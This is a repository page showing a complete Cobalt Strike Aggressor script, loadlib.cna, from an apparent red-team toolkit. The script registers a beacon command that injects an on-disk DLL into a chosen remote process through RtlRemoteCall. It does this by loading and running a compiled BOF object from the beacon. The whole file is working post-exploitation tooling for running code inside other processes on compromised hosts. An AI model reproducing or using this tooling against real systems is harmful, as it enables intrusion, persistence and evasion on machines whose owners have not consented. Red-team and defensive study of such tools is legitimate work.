Halaman utama Jelajahi Bantuan
Masuk
zhensolid
/
OperatorsKit
1
0
Fork 0
Berkas Masalah 0 Permintaan Tarik 0 Wiki
Pohon: 78637e6b40
Ranting Tag
OperatorsKit
/
KIT
/
LoadLib
/
loadlib.cna

loadlib.cna 979 B
Riwayat Mentahan

1234567891011121314151617181920212223242526272829303132 
  1. # author REDMED-X
    2. 

  2. 

  3. beacon_command_register(
    4. 

  4.     "loadlib", "Load DLL from disk in remote process via RPC call.",
    5. 

  5.     "INFO:\nLoad a on disk present DLL via RtlRemoteCall API in a remote process.\nDepending on the process from which you run this tool, it may or may not work.\n\nOPTIONS:\n[pid]: target process to load the DLL into\n[path]: full path to the on disk present DLL\n\n" .
    6. 

  6.     "USAGE:\nloadlib <pid> <path to dll>\n\n");
    7. 

  7. 

  8. 

  9. alias loadlib {
    10. 

  10.     $bid = $1;
    11. 

  11.     $pid = $2;
    12. 

  12.     $path = $3;
    13. 

  13. 

  14.     if ($pid eq "" || $path eq "") {
    15. 

  15.         berror($bid, "Please make sure that both the PID and PATH are specified.");
    16. 

  16.         return;
    17. 

  17.     }
    18. 

  18. 

  19.     # Read in the right BOF file
    20. 

  20.     $handle = openf(script_resource("loadlib.o"));
    21. 

  21.     $data   = readb($handle, -1);
    22. 

  22.     closef($handle);
    23. 

  23. 

  24.     # Pack our arguments
    25. 

  25.     $arg_data  = bof_pack($bid, "iz", $pid, $path);
    26. 

  26. 

  27.     blog($bid, "Tasked to load DLL in remote process..");
    28. 

  28. 

  29.     beacon_inline_execute($bid, $data, "go", $arg_data);
    30. 

  30. }
    31. 

  31. 

  32.